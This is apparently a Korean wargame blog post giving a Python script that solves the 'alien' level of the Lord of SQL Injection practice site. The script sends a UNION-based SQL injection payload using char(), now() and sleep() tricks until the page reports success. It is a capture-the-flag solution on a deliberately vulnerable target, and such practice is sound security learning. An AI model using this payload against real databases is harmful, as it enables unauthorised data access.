LOS2 alien

Wargame/Lord of SQL 2018. 10. 10. 23:48
import requests

def request(payload):
url = "http://los.rubiya.kr/alien_91104597bf79b4d893425b65c166d484.php"
params = {'no':payload}
headers = {'Cookie':'PHPSESSID=84u3mb02noqq3j7t40iv2roqc7'}
response = requests.get(url,params=params,headers=headers)
if "Clear" in response.text:
return True
else:
return False


payload = "4444 union select concat(char(substring(now(),length(now()))%2+96+sleep(1)),0x646d696e)#' union select concat(char(substring(now(),length(now()))%2+97+sleep(1)),0x646d696e)#"
for i in range(1,20):
if request(payload) == True:
print str(i) + " Request Success!"
break
else:
print str(i) + " Request Fail.."

'Wargame > Lord of SQL' 카테고리의 다른 글

LOS2 cthulhu  (0) 2019.05.10
LOS2 All Clear  (0) 2018.10.10
LOS2 zombie  (0) 2018.10.10
LOS2 ouroboros  (0) 2018.10.10
LOS2 phantom  (0) 2018.10.10
블로그 이미지

JeonYoungSin

메모 기록용 공간

,